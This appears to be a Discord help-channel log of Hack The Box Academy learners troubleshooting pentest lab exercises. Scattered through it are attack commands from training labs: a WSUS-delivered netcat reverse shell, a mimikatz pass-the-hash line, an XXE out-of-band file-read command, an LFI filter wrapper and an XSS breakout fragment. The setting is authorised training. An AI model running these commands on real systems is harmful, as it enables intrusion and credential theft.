php://filter/convert.base64-encode/resource=index.php

Now my question is why does one need read= and why does one need .php appended to the file?
Note that I'm not familiar with PHP so you may need to explain like I'm 5, thank you! 🙂

Are lab machines require to have a VIP or even though I don't do tier0 I am able to access some?

Academy is the educational platform with HTB. You can unlock content there by purchasing cubes or having a subscription that unlocks them. VIP is part of the platform that offers the various boxes etc. It's separate.

I think the only thing VIP+ gives you on Academy is time on the pwnbox.

Currently have the student, but been considering the labs as well

@brittle turret not what this discord is about.

@brittle turret Please read the #rules and #welcome.

😂

lol

The reason I asked is because I hoped on yesterday and notice a couple of open machines but they did not require the VIP

yeah there are some free ones i think

Thank you for your help!

Quick question. I'm on the DNS footprinting module and I can answer the first three questions but the last asking what the fqdn of the host where the last octet ends in .203. I don't know how we arrived at the answer. any care to dm me? Sorry if this is the wrong place

Can you tell me how you chmod and then what command you used?

Did you use sudo ssh too and did you copy —-begin—- and —end— to your file but make sure it’s in a directory you have permission over to sometime that can be the issue

Has anyone had any issues with the AD Enumeration & Attacks - Skills Assessment Part I? The target ip's url works for about 20 minutes, then my reverse shell fails and won't work again. I've spawned a new IP several times, and I switched vpn servers 4 times now. I don't have any other VPN's running, but this issue keeps persisting.

yo guys im on

common application attacks

attacking SQL databases

ive connected to target's MSSQL using impacket mssqlclient.py

running select name from dbo.sysdatabases; dosent show any DBs

although when i use use msdb it switches databases

why databases not showing ?

Applications of AI in InfoSec-Skills Assessment. Locally my model is getting 90%, but this is what I get when I submit it.

Where can I learn the CPU architectures for buffer overflows?
Is intro to binary exploitation enough stuff for that?

The meme Emotional Damage is ringing very loudly atm xfreerdp /v:localhost:1234 /u:REDACTED /p:REDACTED /cert:ignore /drive:Shared,//home/joshuagraham/hackthebox
[02:34:02:281] [59884:59885] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[02:34:02:287] [59884:59884] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]

https://tenor.com/view/mansi-creative-khichdi-mansi-majithia-gif-20040378

So I'm doing the AD skills assessment part 1 lab, and I've been struggling with the target machine for about 2 hours now. So far it's been working, but when I set up port forwarding in metasploit, and try to rdp into the MS01 machine, it keeps erroring out no matter what I try. Just very frustrated and demoralized at the moment😂

Also I've switched VPN servers a few times prior to this to hopefully curb the Target IP from failing after about 20-30 minutes which so far that part has been working

use the tcp vpn

I have been I've been only using tcp vpn since I initially started having issues with rdping into window machines. Right now this commmand has just been hanging and I'm hoping for the best lol

xfreerdp /v:localhost:1234 /u:REDACTED /p:REDACTED /cert:ignore /drive:Shared,/home/joshuagraham/hackthebox

try changing the MTU to 1200 instead of 1500

sudo ip link dev tun0 mtu 1200

I'll try that, hopefully it works, and thank you for your help

I don't have experience with forwarding through msf, I used ligolo

I'll have to check that out, I've never heard of it

If you get the underlying principles, it's way better

I'm definitely going to look into that now! This has been a complete pain and I know once I complete this lab I'll probably remember every single command I've used this far😂

ligolo basically works on a different layer so you're not having to use weird port forwarding techniques

the only port forwarding you typically need is to allow for multiple pivots

Ahh ok that actually seems pretty interesting, I didn't know there was multiple ways you can get onto the MS01 machine

multiple ways to pivot

also; i believe the question states to authenticate to, it doesn't specify RDP iirc

That's actually a good point I didn't even think about that. This entire path has been the most challenging so far, but not having any professional IT experience I think I'm doing half decent, although I'm definitely going to have to go through all of these modules again before attempting the CPTS exam

Hey there guys, I have a question about hydra in a skill assessment :
I have been trying to bruteforce a password with a found user, I have had confirmation that the user is the good one, but for the life of me, I don't understand why hydra "times out" like this. I cannot finish one 1000words wordlist before it crashes out.

Is the machine "at fault" ? I've tried adding a longer wait time to mitigate a slower response time, but no success either

\ Multiple failed attempts
\ Am a dumbass who does not know how bash variables work : For the next person who will have this problem, '$USER' is actually $USER, while "$USER" will give out the content of the $USER variable
\ Problem solved ✅

anybody who's done the TE.CL exercise ?

I have

free for a DM ? either the lab is broken or my mind is xD

Ye

Can you someone help on this? I think my answer is correct. Android Fundamentals

• Native Code

What is the name of the function that returns the string inside the cpp file? (Format: FunctionName()). answer: ||stringFromJNI()||

https://academy.hackthebox.com/module/195/section/2182

Hie I am new to hack the box

Anybody can help me in how to do tasks module challenge etc etc

which module you are working on?

I just started using hack the box

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

if you wanna do moduels tho
try doing this first https://academy.hackthebox.com/module/15/section/32

I have a query in exercise part

is ok I found the answer.

Tell module name and topic(sub module) and your query

Answer the question(s) below to complete this Section and earn cubes!

Target(s): Click here to spawn the target system!

• 5 Start the above target, copy the shown IP:PORT by clicking on them, and then paste them in your browser. What's the proof shown in the page?

I just copy paste in the browser but still saying wrong answer

I think you need to Connect VPN. and then browse the IP of the target system. You will get the answer.

oh oops, sorry

thanks

I got the answer thank you

Completed this module can you help me which module should I do next

One minute you think that new Rebel Cracker badge is cool and you try to do the module and the next you're submitting a PR for hashcat

So the the thing is that I'm not really sure how to proceed from a methodology standpoint. Here SMB was open so I should try discovering its version. would this necessarily the case on other technologies? And even here, SMBv1 is open but searching for "smbv1" in Metsaploit brings up no relevant results. I'm trying to understand how to approach these things instead of outright just solving this particular question.

I appreciate any feedback.

https://app.hackthebox.com/starting-point . ftp -h answer doesnt work.

What is the command we need to run in order to display the 'ftp' client help menu? this is question

I did it... Christ, it was painful 🥵

where should i complain that right answer doesnt work?

@novel matrix

This is not the right answer. ftp does not have a -h switch

ftp -h

doesnt work

Because there is no -h for the ftp command

oh

you get the help output because it does not know how to interpret the -h. Depending on the version you are using it should say that in the very first line

oh got it . those blog post gives wrong answer

thanks

Could you give me a nudge

Did you use rockyou ?

I used get to dl each file. Did cd .ssh and used touch to move them there.

You could try Learning Process or Linux/Windows fundamentals

Looking at the Information Security Foundations path, this could be good to follow, i believe the first module you completed in this path anyway

dm

Sure DM

Hello, I am new. Do you guys know how to get started

To learn hacking

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@azure lantern ^

Hello I just started learning . I am stuck in one question "Using what you learned in this section, determine the type of encoding used in the string you got at previous exercise, and decode it. To get the flag, you can send a 'POST' request to 'serial.php', and set the data as "serial=YOUR_DECODED_OUTPUT". Effort : I just found which type of encoder for this data from previous exercise and found out it was base64 and then decode it accordingly and put the result into solution box . But it is telling me wrong result. I don't know why it is getting wrong result. Could anyone please help me to fix the issue ?

Can I get the link something for what are you aiming to

Yes sure

https://academy.hackthebox.com/module/details/9

Okay I will just go through

Or enroll into information security foundations skill path, that way when you finish the module, you can click continue and it will send you to the next module

is it possible to send responder.py to a target machine that has no internet connection? its as if i need a connection to install it somehow

You could base64 encode it then decode it on the target

@quartz sundial here.

oh i can send the py file, it just needs dependencies

anyone done the Escape box recently and tried the alternative approach? even when i execute the walkthrough commands i get an error trying to connect to mssql (Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.)

Hello ,

Can some one kindly help me I am stuck at Advanced Command Obfuscation :
Or if some one can confirm cause I tried the answer from the "ShowSolution" and did not work

Best to ask in #boxes for box help

Scp

Hello guys,

I am having some issues on this question:

API Attacks - Broken Authentication - Exploit another Broken Authentication vulnerability to gain unauthorized access to the customer with the email 'MasonJenkins@ymail.com'. Retrieve their payment options data and submit the flag.

I am exploiting the right endpoint, but every time I try to generate a OTP, I get ("SuccessStatus": false). I tried to do it authenticated and not authenticated.
Someone could help?

Web Attacks > IDOR > Bypassing Encoded References

• I'm trying to to do the assessment, but when trying to use the scripts and even manual curl commands, I keep stumbling with "Contract Name is not defined."
  Appreciate any insight, thanks

Can someone here give me a nudge with the file upload skill assessment pls? I cant locate my file i am using the correct date format i think but i keep getting a 404 error

Off the top of my head, you need to read some source code... I will leave it at that

In the File Inclusion -> PHP Wrappers section, not sure why but the expect wrapper doesn't return anything even though it's enabled. I tried the curl command and a manual request through Burp and neither output anything back in the body, not sure why

Just remembered what it is, you might need to read some documentation on date formats if you're not sure you've got the correct one :p

i read the upload.php file i got the correct file location and the name of file format is correct but getting 404. i bypasses black and white list and got a successfull upload message. the server is giveing todays date when i use curl to check the date so no clue whats wrong

i know the difference beteen Y and y for php date if thats what you mean

If you get a 404 then you don't have the correct file location, which means you probably don't have the correct date format

Let me know if you want me to DM you the specific answer

i am a new person into the field of ethical hacking, where can i discuss more about advices?

Im doing this part of password attacks

Passwd, Shadow & Opasswd

what is the password list that I should use?

What deep learning architecture, known for its ability to process sequential data like text by capturing long-range dependencies between words through self-attention, forms the basis of large language models (LLMs) that can perform tasks such as translation, summarization, question answering, and creative writing?

ChatGPT

realy could use a hint for file upload skill assessment here

Module: Web Attacks
Page: Blind Data Exfiltration

Hi, I’m currently working with the XXEinjector tool and running into some issues. I’d like to share the command I’m using along with my xxe.req file (which includes the required headers and the XXEINJECT keyword) to get some help.

For some reason, the tool isn't working as expected — it just returns the help output, as if one of the parameters is incorrect. I’ve double-checked everything but still can’t get it to work.

Would it be okay to share my code and setup here for troubleshooting? Or is there someone I can directly reach out to for support?

Ok . i use chatgpt. and i always get "Transformer Architecture." and i put it in the answer box, but its wrong. whats now the answer?

hey guys

just paste the command you're running

ruby XXEinjector.rb --host 10.10.15.250 --httpport=8000 --file=/tmp/xxe.req --path=/etc/passwd --oob=http --phpfilter

This is the file at /tmp/xxe.req

POST /submitDetails.php HTTP/1.1
Host: 10.129.255.191
Content-Length: 126
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: /
Origin: http://10.129.255.191
Referer: http://10.129.255.191/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
XXEINJECT

MyIP 10.10.15.250
Target: 10.129.255.191

what's the command output?

Displays the help menu

XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications.

Options:
--host Mandatory - our IP address for reverse connections. (--host=192.168.0.2)
--file Mandatory - file containing valid HTTP request with xml. You

which is the same as the README file

@frosty crescent

Join..

try --host=10.10.15.250 (= instead of space)

wow

I spend hours lol

thank you

np

In login bruteforcing module skill assessment 2 i am bruteforcing the ftp user locally with multiple list created from cupp and username anarchy thousands of words and nothing came up any hint ?

Who can hack

@green shuttle join..

Click the link abov

I can

Did it

For free ?

Yeah

Have you joined @wintry chasm ?

Yep

Okay

can we ban these guys or

fr only a matter of time😪

thought they were a part of the support team but they are just a skam

Having an issue double pivoting in msf, portfwd add -R -l 8081 -p 1234 -L <attack-ip> isn't working as intended. The double pivot host seems to be connecting to the first pivot host but msf isn't able to catch the shell

they want a wallet or something

Classic grift they won't last long here

Has anyone gotten a "ERROR][com.freerdp.core.transport] - [transport_default_write]: BIO_should_retry returned a system error 32: Broken pipe"

Error when trying to xfreerdp3 into an endpoint?

For context I'm doing a CDSA module in the "Windows attack and defense" path

Module: API Attacks
Page: Broken Authentication

I am exploiting the right endpoint, but every time I try to generate a OTP, I get ("SuccessStatus": false). I tried to do it authenticated and not authenticated.
Someone could help?

If someone have the same problem in the future.**
The email is case sensitive, don`t change it.

I think I get this error when my user does not have rdp permissions. Might be confusing this with another error though

But but I'm using the credentials it's giving me ugh

Guys any program that helps new ppl like cheat engine?

Are you able to use a different authentication method like winrm

Thanks @acoustic thorn

@green shuttle if you joined that discord, it’s a scam server

I can try that. I am just confused. I am doing the same thing I've done with all the modules before this but can't rdp into this new target

Okay at least now the error changed to "[ERROR][com.freerdp.core.transport] - [transport_check_fds]: transport_check_fds: transport->ReceiveCallback() - STATE_RUN_FAILED [-1]
"

Sometimes legitimate users are not allowed to rdp. You can validate that your credentials are correct using crackmapexec or nxc if your target has an open smb/ldap port

Oh good freaking grief

I forgot to add /cert:ignore to the command line

Sorry for bothering

Lol sometimes its the simple things no worries

yup joined and got out they told me i needed a wallet to get the access i wondered if that was a new feature in HTB

No no, long story short, if you need HTB support, there is only 1 source

and thats the website

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

i know i was kidding

glad you are safe

can you help me with a question regarding a module

@golden halo please read #welcome and #rules

Sure, dm me with the module and everything you tried

I think it's a mix of that and I might be attempting to connect too quickly to these boxes. Made it through that previous module, and now am working on a different module and getting the same rdp issues

Might need to give these windows boxes a few more minutes before trying to mess with them

Hey, I am currently working on Skill ass part 1 on Windows privesc module and a little help needed here:) I have a question regarding second task. Specifically regarding kernel enumeration. But don't wanna spam here, anyone dm?

dm me if want 🙂

Hello everyone please help can I see a legit spammer who create all kind of hacking tools on office 365?

what?

Can i DM someone about the file upload skill assessment?

frustrated from all the 404 errors im getting/

did you manage to bypass the filter?

yes client side and backend but just getting a 404 error once i uploast my file

when i browse to execute cmd= i get the 404 error

use another way to abuse it if you have the right extension that allows you to do malicious things

Here is modified message for Java script encoding and decoding . Please let me know if anyone knows how to resolve the problem . I am keep getting same message but don't know why . I don't know where I made mistake . : echo -n "N2gxNV8xNV9hX3MzY3IzN19tMzU1NGcz" | base64 -d

7h15_15_a_s3cr37_m3554g3"

curl -s -X POST -d '{"serial" : "7h15_15_a_s3cr37_m3554g3"}' http://94.237.123.126:35472/serial.php
N2gxNV8xNV9hX3MzY3IzN19tMzU1NGcz

||curl -s url -X POST -d "serial=secret"||

Why can't I talk in the general tabm

And why am I Sage McVerify 😭

Hello, sorry if this question sounds stupid, but I've just started with HTB, and it's day 3 of my cybersecurity learning journey. I have a question about the "Information Security Foundations" path skills. Where can I ask about this in the forum? I'm currently trying to set up ParrotOS via Pwnbox. According to my information, Pwnbox should be accessible via the settings, but I don't have it in the menu. Thx! 😊

All the answers can be found in #rules and #welcome

😦

you don't "set up ParrotOS via pwnbox" pwnbox uses ParrotOS

Okay thx! But where do I find Pwnbox. It's not in the settings.

Hello, I have a question. I'm just getting started on the platform. I'm currently in the Linux Fundamentals module, in the System Information section. The practice exercise says I should connect to the VPN and then connect via SSH. I can see the username and password, but I don't see the port. How can I connect in order to answer the questions?

Hehehehe, I’m connected now — I was entering the wrong IP 😛

I was wondering if there was someone I could talk to about the file transfer module Linux subsection if there could be a change to this section

Hello guys

@barren geyser No. This is not a hacker for hire server.

you found only phar.jpeg as extension filter bypass ?

Stack-based buffer overflow on Linux (xc2 in memory)...
Throwing this in because it took me way too long to figure out:

• python3's print works differently than the presumably python2 this module was written in.
• in order to make this code work, you have to use sys.stdout.buffer.write() instead of print and give it bytes, not str.

reference site: https://stackoverflow.com/questions/42615124/exploit-development-in-python-3

Or... just use python2

Otherwise using pwn library is what most do instead

giving folks the info because it was never answered in the forums

✅ mission Rebel cracker 🔓🔑😎

i changed to shell.php.png. file uploaded but still got 404

you don't have the right extension search well

ah yes and when you make intruder uncheck the small box

you are fuzz the content-type for see what acceptable ?

hey all, is this the right place to ask questions if im feeling stuck in htba and need a nudge in the right direction? Not necesarilly looking straight for the answers

Im in the getting started module, and ive hit a blocker in the section that it teaches how to use metasploit to run exploits on vulnerable software. ive identified a wordpress 5.6.1 running on the target server, but im stuck from there as googling vulnerabilites brings me too much information and searching "exploit wordpress 5.6.1" or something simillar on metasploit doesnt seem to bring my anything usefull :c

Have you tried looking around the target website itself for clues?

Yup, It says the plugin name and a directory that it stores backups to. I´ve tried searching for the plugin name in metasploit, found 1 result but its an auxiliary. I´ve run it, and it gave me a txt file with alot of information that i think are usernames that it tested

So you found a working exploit that reads files?

Maybe you could read something else.. like the flag

So thats the part that im kind of stuck at... metasploit lists it as an auxiliary, but i cant find an "exploit" with the plugin name

i dont know if im too focused on trying to find something that explicitly says exploit or if auxiliaries are just as good

You are using an exploit to read files from the machine.

ohh understood. so pretty much everything, whether is says exploit or auxiliary, are exploits?

no not always

but this module allows you to read files from the system.. what is the question asking you to do?

it asks me to find a flag, the webpage hints that the flag is in a directory in wordpress

ok, so it wants you to read a flag. you have an exploit to read files.

my instance died just as i think i was about to solve it hahaha. imma crack my head a bit on this and if im still stuck after alot of attempts ill be chatting here again, allthough im pretty sure i should have it solved

ty for the help! you set me in the right direction but in the end one of the main reasons i couldnt solve the problem was becuase in the exploit i was configuring it wrong. I wasnt using the "set filepath" option, instead I was using the "set targeturi" and placing the file directory there and i had no results (because i hadnt configured what I needed it to search for... hahaha). thanks again 🙂

Hello, I'm having an issue with running nmap through proxychains. I'm following the instructions exactly and can access things on the internal network such as through curl or firefox, but when I try to run an nmap scan it says all ports are non responsive. I am using the -Pn and -sT flags for nmap. Any suggestions on what I can fix?

try --proxy if using proxychains doesn't work

Where would the --proxy go? I don't see it anywhere in the nmap manual

https://nmap.org/ncat/guide/ncat-proxy.html

My command is nmap 172.16.5.35 -Pn -sT -v --proxy socks4://127.0.0.1:9050, I'm connecting to the host through ssh and exposing port 9050 with ssh -D 9050, and I'm still getting no ports open from nmap. Do you see anything wrong with my commands?

In RFI > Remote File Inclusion (RFI)
I can't get SMB file inclusion to work even though my share works (I can connect to it with smbclient) and every command also returns:
Notice: Undefined variable: p2 in /var/www/html/index.php on line 48

So I think there might be an issue with the server? Not sure

Actually I did LFI on the server to read index.php and it does try to echo an undefined variable on line 48....

Try using socks5

@sturdy citrus Please do not post content from modules above tier 0.

@plain hare Please do not post content from modules above tier 0.

someone here had a question about xss phishing can't remember who it was but now that I'm on my laptop:
you need to escape the context of the img tag using techniques from previous sections. Probably what you're looking for:
||'><script>document....</script><!--||

Hey Guys, I am doing pivoting tunneling module in the first section after introduction I have to rdp into a machine after dynamic port forwarding xfreerdp is not working

If you’re seeing a black screen, try pressing enter

No I am facing time out error

Rdesktop is working but saying wrong creds becuade it don't support NLA

Try with remina

Okay let me try

I’m not sure about why it times out, maybe someone else has more info about why 😅

Ah okay, anyways thanks for help

Okay so I managed to get the flag not the intented way but after setting up your dynamic port forwarding and proxychains You can use evil-winrm to connect to windows but still rdp is giving timeouts even after creating kerbros file

Probably due to having to pivot, you could increase the timeout threshold or use TCP

Is there anyway to hide the cpts attempts blocked banner

It is mildly bothering me

Thanks for the suggestion will try it

aye some legend can help me with "logrotate" page on linux privilege escalation Module

please >?>?>

You can use a custom ublock rule

Where do I find on the HTB Homepage the Pwnbox. For my knowledge it should be on the settings. Thx!

The pwnbox is available within sections that have a target you can spawn and interact with.

Okay thx. I am making here my first steps in HTB with the path skills.

the thing i do is delete that html

hi

I'm doing the Evasion module, but I think my issue has nothing to do with the course and is a general C# issue. I've made sure to create a console app and build in "release" mode. It "works" and solves the first section, but it compiles to a collection of files with a .dll being the one I had to work on evasion with (not the .exe ). Obviously noone is creating implants that looks like this. Is there a button somewhere I should have ticked?

in pass-the-hash modules there is a optional question ask "Optional: John is a member of Remote Management Users for MS01. Try to connect to MS01 using john's account hash with impacket. What's the result? What happen if you use evil-winrm?. Mark DONE when finish."

i am not getting this question it telling us to connect same as who we connected like david using "```
./mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64f12cddaa88057e06a81b54e73b949b /domain:inlanefreight.htb /run:powershell.exe" exit"-
or through linux

Either way is fine, it's better if you can try both ways so you get to practice them

i tried using mimikatz but got the shell of admin not of user

and from the rdp connection we have taken first from there we have to connect to john or what?

So you're supposed to use evil-winrm or to spawn a powershell session because of his permissions

from kali?

No, from the current machine, because unless you know some pivoting you won't be able to connect to it from kali I don't think, unless I'm not remembering correctly

ok got it

Quick question, I did the Backup and Restore page in the Linux Fundamental course, and I found this command. Which doesn't make a lot of sense to me, cronjob is a johntheripper script present on the pwnbox, shouldn't this be crontab?

Because that is what I ran in order to replicate the instructions on my machine, and that worked as a charm. (maybe a note to add /usr/bin/ to crons path in order to reach rsync would've been useful)

a dns A record does not indicate that it doesnt have subdomains and therefore should be dnsenum-ed always

is this correct? sorry the DNS foot printing module was very confusing for me to understand what was going on

yes, should be crontab. Best to post that in #1234357888114364508

I'll do that, thank you for the second opinion ❤️

Hi everyone,
Malicious Document Analysis:Skills Assessment - Maldoc Analysis
If anyone has experience with this can, I would really appreciate your help!

Not necessarily, it just depends on what DNS information the server allows you to enumerate, for instance if you're allowed a full zone transfer dnsenum is not 100% necessary

It also depends on the engagement evasion requirements wherein a more evasive test would warrant using quieter tools and methods

ey guys good afternoon. Someone can help me with module AI please?

hi.. not sure if anyone has seen this before

i used the commands from academy and only changed the ip, but it does not seem to work

are you 100% sure you did not delete a bracket or a ' somewhere

I’m like 1000%sure

Coz I only changed the IP bit

Run it from cmd instead

Oh they are different?

Increasing the timeout worked

I saw it in the guide saying run it in the powershell that’s why I did that

In your case the variables get evaluated in the parent shell, so the command breaks.

Ah I see, Okie I’ll take another look, thank you!!

Hey

Hey guys, I have created a dynamic tunnel with pivot host so I can connect to the rdp and execute my payload and I have also created a reverse tunnel but after executing I am not receiving shell here are the commands I used

I am doing Remote/reverse port forwarding with ssh in pivoting module

@cold star Please take care not to post content from modules above tier 0

Under Android Fundamentals, Android Debug Bridg, I have already successfully emulated Pixel 4 and performed all the necessary steps, but myapp.apk does not show in the Pixel 4 and there is no flag.txt in /sdcard/Download/. Does anybody know what could be going wrong?

Okay

I'm currently working on the Domain Trusted Attack module on Hack The Box Academy, but the connection is extremely slow and unstable—even after switching VPN servers.

After connecting to the Linux box, I need to use xfreerdp to access a Windows box. However, during this process, the RDP session keeps freezing or disconnecting.

Is there any way to stabilize or improve the performance of this connection?

Try changing regions. ie. EU -> US or US -> EU

also you can make configuration changes to help if need be https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn

I'd also recommend TCP VPN instead of UDP

Snaffler: if I dump output to a file and transfer to another system (linux or Windows) how can I get the color to highlight? I see the {Red} {Yellow} {Green} tags, etc, but if I "cat" or "type" the the log in Linux or Windows respectively the colors won't display.

Thank you for your advice

ey guys someone had completed the module AI?

anyone can help me in spawning a reverse shell using wsus? windows lateral movement module optional exercise

I obtain error: the files for this update failed to download,
using Get-WinEvent I see that it fails to download psexec but even after copy psexec in the wsus folder with the expected name I obtain again the error, that because in my opinion in the payload of psexec is present also \tools\nc.exe, but I would expect another event for a different failed downloaded file... instead I keep having same error on same file

Im using || .\SharpWSUS.exe create /payload:"C:\Tools\sysinternals\PSExec64.exe" /args:"-accepteula -s -d cmd.exe /c 'c:\tools\nc.exe <myip> 9001 -e cmd.exe'" /title:"TestREV" ||

@vernal tapir Please do not spoil contents from modules above tier 0, especially details about the skill assessment

I had luck with a SnafflerParser project that parses output, even better than getting color out of the output logs.

I'm so sorry honestly, what's the best way to ask for advice, while still giving enough information for someone to respond? I know it's a hard one for me to see what I can/can't leak you know.

Like don't share specifics etc

Just ask without revealing details like which ID is the admin, etc. Or ask for someone to DM you if you feel like you need to say more things. Anyone who has completed the modules and can help doesn't need the specific details revealing stuff like that.

Yeah that's very true, thank you

In the LFI module, it states "The most common LFI tools are x/y/z" but that they're all unmaintained, is it worth my time learning those or should I just stick to ffuf?

I tend to prefer ffuf over specialized tools personally anyways

ffuf isn't really an LFI tool but rather a web fuzzer

Wouldn't these tools just do web fuzzing tailored to LFI detection anyways

Are you still messing around with this one?

which module/section? i'm not seeing any tools in the lfi and file uploads section of the file inclusion module

Bug Bounty Hunter -> File Inclusion -> Automated Scanning, last paragraph "LFI Tools"

the age of the tool doesn't really matter. it also doesn't really matter which tools you use. use what you like, whatever you're comfortable with, etc. some tools may give different results sometimes though, so it's not bad to have alternative ways of doing things.

Ok, I'll try them out then, will probably end up sticking to ffuf though

you can probably hammer that nail in with a wrench, but a hammer is just going to do it better

and i'm not talking about lfi specifically just in general with tools

Hi, if anyone has done the Web Attack Skills Assessment and don't mind giving me a hint or two shoot me a dm or reply please 🙂

dm sent

Hi I am having issues with Linux privesc skills assesment - client_loop: send disconnect: Broken pipe on ssh just after few seconds of login

Hey, I'm interested in hacking and everything around it. If you find it interesting too or just want to chat, feel free to send me a message.

Please read #welcome and #rules it will explain how to get verified

hey all im stuck on a ffuf question, cant seem to figure out what im doing wrong

Wuzz the question

im running a parameter scan on the page but the response status accross every attempt is the same

That’s the issue, not the question. What is it asking you to do?

Using what you learned in this section, run a parameter fuzzing scan on this page. what is the parameter accepted by this webpage?

Pm me what you’re trying

sure

Can someone verify it are you facing this? Because its really annoying I have tried changing my vpn file , using pwnbox , stabilisint the shell , getting a revshell from the ssh and changing internet but still its the same everytime.

still i'm stuck at AI 😦

I am working on HTB Academy - Attacking Common Applications - Attacking ColdFusion. The module ask "What user is ColdFusion running as?"

I have a reverse shell via the ColdFusion exploit they mention in the module text. I run commands that show all of the users on the CF host machine. The module doesn't accept any of them as the correct answer

I've also run commands that show what processes are running on the machine. and which users are running those processes. The module doesn't accept this user account as the correct answer.

Some can help me with the lesson question "PoC Patching and Null Safety" ?

so my VM is running, parrotOS won´t open. it´s open for a second, that´s it. any suggestions!

Revert to a previous snapshot if you have it or maybe reinstall? not sure what you mean by you have the VM running but the OS won't "open."

Hi guys. I'm stuck at Pivoting section of Intro to C2 Ops with Sliver module. I am following the exact same steps to try and reproduce the pivot but for some reason it doesnt work. Modified proxychains.conf, compiled the go chisel for sliver and added it to the directory and restarted, set up the server and then connected using chisel client. My chisel client connects to my server but when i use proxychains with crackmapexec it just doesnt respond. I think the problem could be my chisel server. Did you guys use the default chisel server that comes in the pwnbox?

hi guys, I stuck at web enumeration because "url not found". i am trying to open login page so I can log in and retrieve the flag, but I cant

try http not https

tried both, with and without port number

which module is that?

Getting started (Offensive)

try some of the techniques described in the section

directory busting maybe? 😉

tried them all, gobuster works and I can open the site as seen on scrshot

but when I try to enter log in page 94.237.59.174:31910/private, I cant

see web source code or subdomain, dns. It is for sure one of the techniques described in the section.

https://academy.ule/112/section/1079
Footprinting Lab - Medium
Footprinting
I cant seem to find the user for the one question

ok, thanx, solved it! 🙂

Why can’t I message in general lol

Verify your account by reading the #rules and following the instructions in #welcome to access most channels, including #general.

My bad yea

@limber salmon Guess you beat me to it lmao 🤣

Anyone else having trouble connecting to target machines on Academy despite being successfully connected via openvpn? This is very strange and only started last night. I've tried everything I can think of (trying NAT and Bridged from VMWare Parrot OS, restarting the computer, flushing cache) but no matter what I do, or how many different HTB servers I try, I can always successfully connect via the given ovpn file, but cannot reach any of the targets, including targets I previously had no problem reaching in earlier modules. "ip a" shows that the tunnel is up, and I can ping the tunnel gateway and get a response no problem, but I cannot for example ssh into a target box (where this had worked previously). It feels like I'm hellbanned from the network or something. I appreciate any help, or if anyone has any advice. Unfortunately this is totally halting my ability to go through any new sections, and it was going great before. (Also for some reason the ability to chat with help is disabled for me)

reach out to support

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

Thank you, I appreciate the response. I reached out via email but for some reason the ability to open a ticket or send a message to the help team is unavailable for me. I've tried on three different computers, my phone, someone else's phone, and still don't have the ability. No adblockers, fresh install of browsers just to make sure. If I've been banned from the feature I don't know why but apologize.

¯_(ツ)_/¯

i'm not staff, but i doubt they'd ban someone from the feature

Yeah it seems very odd to me too. I just figured maybe this was an issue affecting everyone? I really wanted to be sure it wasn't just a browser issue or something.

it's working fine on my end

• Browser: Chrome
• System: ChromeBook/ChromeOS

Thank you, good to know

Would you mind sending me some sort of hint on this? I've been in circles with an executable that, when run on the dev box, does create a revshell. But when put in this folder never connects and produces the same log @shut wraith had. Given the static section had requirements not described in the module I suspect you have a similar hint for this dynamic section.

Send me a DM

I need my old discord account unlinked from my hackthebox account

you can dm me

@gray yacht I finally completed the section we were working on

super cool. I still gotta fix my kali vm but I got this working

I got the flag

double pivoting section completed

I am currently running into something weird with the following question in 10 - Password Attacks and would appreciate a nudge

Q - Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \\DC01\julio.

As expected, I have 2 ccache files for Julio, ones expected and one shouldn't be...except they're both expired between the time it takes me to import, set the variable and smbclient in to get the `.txt file

Screenshots attached
Redoing it again shows the fiel size as 0 now

By the time I get the refreshed ccache file and go through the process again, its already expired

Hey, was wondering if someone could help me by explain, why some URL parameters would prefer + instead of spaces, just spent way to long on a module where my URL encoding kept failing because I was encoding spaces instead of +.

how do i get started it confusing